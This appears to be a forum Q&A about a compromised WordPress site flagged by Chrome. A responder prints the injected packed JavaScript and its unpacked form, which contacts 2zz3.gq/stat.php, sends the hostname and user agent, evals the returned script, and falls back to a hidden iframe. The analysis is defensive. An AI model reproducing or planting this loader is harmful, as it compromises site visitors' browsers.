I'm getting an error with the WordPress page REMOVED, it seems that the website 2zz3.gq
is being "injected" into the request but I'm not really sure when or how.
When I try to load the page on Chrome I see a "The site ahead contains malware" error:
But I see no error on Firefox or other browsers. How can I solve this issue? So far I have tried:
2zz3.gq
(apparently a server from Russia) but the error still appears on Chrome.Could please someone give me some advice on this issue?
Is the plugin disabled now?
Check the source of your site to see if it has been modified in any way.
Easiest might be to restore a backup to ensure you don't miss any malicious changes.
WARNING
This is malicious code. I've put it on here for explanation purposes, but I'd recommend that you DO NOT execute this
It's not as bad as a link that someone might accidentally click, and I figure this warning should suffice for anyone who decides that pasting this into their JS console seems like a good idea...
I see the following packed
code block when I curl
your site.
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('26 25(7,13){15 9=7.80(13);10(9>78)49"76: 83 100 5";19 9}26 35(7){10(1!==85.22)49"93: 92 88 86 87";7=99(7);15 13,9,17=[],31=7.22-7.22%3;10(0===7.22)19 7;97(13=0;31>13;13+=3)9=25(7,13)<<16|25(7,13+1)<<8|25(7,13+2),17.28(20.21(9>>18)),17.28(20.21(9>>12&63)),17.28(20.21(9>>6&63)),17.28(20.21(63&9));96(7.22-31){74 1:9=25(7,13)<<16,17.28(20.21(9>>18)+20.21(9>>12&63)+33+33);77;74 2:9=25(7,13)<<16|25(7,13+1)<<8,17.28(20.21(9>>18)+20.21(9>>12&63)+20.21(9>>6&63)+33)}19 17.55("")}15 33="=",20="79+/",81="1.0";26 51(){15 11;37{11=39 68("82.70")}44(17){37{11=39 68("94.70")}44(95){11=90}}10(!11&&91 66!=\'89\'){11=39 66()}19 11}26 72(14){23=14.30(\'\\<54\');10(23==-1)19\'\';23=14.30(\'>\',23);10(23==-1)19\'\';23++;24=14.30(\'\\<\\/54\\>\',23);10(24==-1)19\'\';19 14.58(23,24)}26 64(14){10(14.30(\'%48%\')==-1)19 14;19 14.98(\'%48%\').55(36(35(62.65.75)))}26 60(56){15 27=" "+34.27;15 40=" "+56+"=";15 38=42;15 29=0;15 24=0;10(27.22>0){29=27.30(40);10(29!=-1){29+=40.22;24=27.30(";",29);10(24==-1){24=27.22}38=84(27.58(29,24))}}19(38)}34.107(\'<57 132="43"></57>\');10(60(\'133\')==42){15 32=\'50\'+\'7\'+\'45:\'+\'/\'+\'/\'+\'2\'+\'61\'+\'61\'+\'3\'+\'.\'+\'47\'+\'134\'+\'/\'+\'131\'+\'73\'+\'7.45\'+\'67\';32+=(\'?7=3&126=\'+36(35(62.65.125)));32+=(\'&101=\'+36(35(127.128)));37{15 11=51();11.129(\'136\',32,137);11.145=26(){10(11.146==4&&11.142==138){14=64(11.139);34.71("43").69=14;41=72(14);10(41.22>0)140(41)}};11.141(42)}44(17){34.71("43").69=\'<\'+\'59\'+\'46\'+\'144 124\'+\'108\'+\'="52\'+\'109\'+\':/\'+\'/\'+\'110\'+\'2\'+\'-\'+\'53\'+\'102\'+\'53\'+\'.\'+\'47\'+\'73\'+\'/\'+\'103\'+\'104\'+\'112\'+\'.45\'+\'67"\'+\' 113\'+\'121=\'+\'"0\'+\'" 122\'+\'119\'+\'7="0\'+\'" 46\'+\'118\'+\'114\'+\'31="\'+\'0" 115\'+\'116\'+\'117\'+\'52="\'+\'0" 123\'+\'120\'+\'105\'+\'50="\'+\'0" 106\'+\'111\'+\'143\'+\'47="\'+\'130\'+\'">\'+\'<\'+\'/\'+\'59\'+\'46\'+\'135\'+\'17\'+\'>\'}}',10,147,'|||||||t||_|if|xmlhttp||A|src|var||e||return|_ALPHA|charAt|length|start|end|_pref_xxs_getbyte|function|cookie|push|offset|indexOf|r|url|_PADCHAR|document|_pref_xxs_encode64|encodeURIComponent|try|setStr|new|search|code|null|statspan_0_1|catch|p|fr|g|ENCURL|throw|ht|_pref_xxs_getXmlHttp|h|b|script|join|name|span|substring|i|_pref_xxs_getCookie|z|window||_pref_xxs_processMacro|location|XMLHttpRequest|hp|ActiveXObject|innerHTML|XMLHTTP|getElementById|_pref_xxs_extractScript|a|case|href|INVALID_CHARACTER_ERR|break|255|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|charCodeAt|_VERSION|Msxml2|DOM|unescape|arguments|argument|required|one|undefined|false|typeof|exactly|SyntaxError|Microsoft|E|switch|for|split|String|Exception|ua|o|co|un|nheig|sc|write|rc|ttp|l|rol|ter|wid|rde|mar|ginw|idt|amebo|gh|rgi|th|hei|ma|s|hostname|d|navigator|userAgent|open|no|st|id|stat01|q|am|GET|true|200|responseText|eval|send|status|lin|ame|onreadystatechange|readyState'.split('|'),0,{}))
which translates to
function _pref_xxs_getbyte(t,A)
{
var _=t.charCodeAt(A);
if(_>255)throw"INVALID_CHARACTER_ERR: DOM Exception 5";
return _
}
function _pref_xxs_encode64(t)
{
if(1!==arguments.length)throw"SyntaxError: exactly one argument required";
t=String(t);
var A,_,e=[],r=t.length-t.length%3;
if(0===t.length)return t;
for(A=0;
r>A;
A+=3)_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8|_pref_xxs_getbyte(t,A+2),e.push(_ALPHA.charAt(_>>18)),e.push(_ALPHA.charAt(_>>12&63)),e.push(_ALPHA.charAt(_>>6&63)),e.push(_ALPHA.charAt(63&_));
switch(t.length-r)
{
case 1:_=_pref_xxs_getbyte(t,A)<<16,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_PADCHAR+_PADCHAR);
break;
case 2:_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_ALPHA.charAt(_>>6&63)+_PADCHAR)
}
return e.join("")
}
var _PADCHAR="=",_ALPHA="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",_VERSION="1.0";
function _pref_xxs_getXmlHttp()
{
var xmlhttp;
try
{
xmlhttp=new ActiveXObject("Msxml2.XMLHTTP")
}
catch(e)
{
try
{
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")
}
catch(E)
{
xmlhttp=false
}
}
if(!xmlhttp&&typeof XMLHttpRequest!='undefined')
{
xmlhttp=new XMLHttpRequest()
}
return xmlhttp
}
function _pref_xxs_extractScript(src)
{
start=src.indexOf('\<script');
if(start==-1)return'';
start=src.indexOf('>',start);
if(start==-1)return'';
start++;
end=src.indexOf('\<\/script\>',start);
if(end==-1)return'';
return src.substring(start,end)
}
function _pref_xxs_processMacro(src)
{
if(src.indexOf('%ENCURL%')==-1)return src;
return src.split('%ENCURL%').join(encodeURIComponent(_pref_xxs_encode64(window.location.href)))
}
function _pref_xxs_getCookie(name)
{
var cookie=" "+document.cookie;
var search=" "+name+"=";
var setStr=null;
var offset=0;
var end=0;
if(cookie.length>0)
{
offset=cookie.indexOf(search);
if(offset!=-1)
{
offset+=search.length;
end=cookie.indexOf(";
",offset);
if(end==-1)
{
end=cookie.length
}
setStr=unescape(cookie.substring(offset,end))
}
}
return(setStr)
}
document.write('<span id="statspan_0_1"></span>');
if(_pref_xxs_getCookie('stat01')==null)
{
var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
url+=('?t=3&d='+encodeURIComponent(_pref_xxs_encode64(window.location.hostname)));
url+=('&ua='+encodeURIComponent(_pref_xxs_encode64(navigator.userAgent)));
try
{
var xmlhttp=_pref_xxs_getXmlHttp();
xmlhttp.open('GET',url,true);
xmlhttp.onreadystatechange=function()
{
if(xmlhttp.readyState==4&&xmlhttp.status==200)
{
src=_pref_xxs_processMacro(xmlhttp.responseText);
document.getElementById("statspan_0_1").innerHTML=src;
code=_pref_xxs_extractScript(src);
if(code.length>0)eval(code)
}
};
xmlhttp.send(null)
}
catch(e)
{
document.getElementById("statspan_0_1").innerHTML='<'+'i'+'fr'+'ame s'+'rc'+'="h'+'ttp'+':/'+'/'+'l'+'2'+'-'+'b'+'o'+'b'+'.'+'g'+'a'+'/'+'co'+'un'+'ter'+'.p'+'hp"'+' wid'+'th='+'"0'+'" hei'+'gh'+'t="0'+'" fr'+'amebo'+'rde'+'r="'+'0" mar'+'ginw'+'idt'+'h="'+'0" ma'+'rgi'+'nheig'+'ht="'+'0" sc'+'rol'+'lin'+'g="'+'no'+'">'+'<'+'/'+'i'+'fr'+'am'+'e'+'>'
}
}
Note the line
var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
which actually constructs the 2***.gq
url. 1
If you don't have a stat01
cookie set, it loads stat.php
from there (presumably malicious JS source) and executes it using eval
.
In the process of making the request, it also sends up some user data (for metrics, loading proper exploit code, or something else?), including the current hostname and the useragent of the user's browser.
Note that, should this fail, it also falls back on loading a URL at another domain l2***.ga/counter.php
1 in an iframe
.
1 link purposely broken, see source if you're interested